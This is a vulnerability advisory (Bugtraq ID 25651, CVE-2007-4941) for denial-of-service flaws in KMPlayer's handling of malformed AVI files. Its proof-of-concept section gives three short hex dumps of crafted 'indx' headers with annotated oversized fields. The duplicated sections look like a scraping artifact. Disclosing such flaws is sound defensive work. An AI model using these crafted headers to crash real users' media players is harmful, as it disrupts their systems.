KMPlayer Multiple Remote Denial of Service Vulnerabilities
BID:25651
Info
KMPlayer Multiple Remote Denial of Service Vulnerabilities
| Bugtraq ID: | 25651 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2007-4941 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Code Audit Labs are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
KMPlayer KMPlayer 2.9.3.1214 |
| Not Vulnerable: | |
Discussion
KMPlayer Multiple Remote Denial of Service Vulnerabilities
KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
These issues affect KMPlayer 2.9.3.1210; other versions may also be vulnerable.
KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.
Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
These issues affect KMPlayer 2.9.3.1210; other versions may also be vulnerable.
Exploit / POC
KMPlayer Multiple Remote Denial of Service Vulnerabilities
The following proof-of-concept AVI header data is available:
new_avihead_poc1.avi
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
new_avihead_poc2.avi
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
new_avihead_poc3.avi
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
The following proof-of-concept AVI header data is available:
new_avihead_poc1.avi
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
new_avihead_poc2.avi
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
new_avihead_poc3.avi
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
Solution / Fix
KMPlayer Multiple Remote Denial of Service Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
KMPlayer Multiple Remote Denial of Service Vulnerabilities
References:
References:
- KMPlayer Homepage (KMPlayer)
- CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities (Code Audit Labs)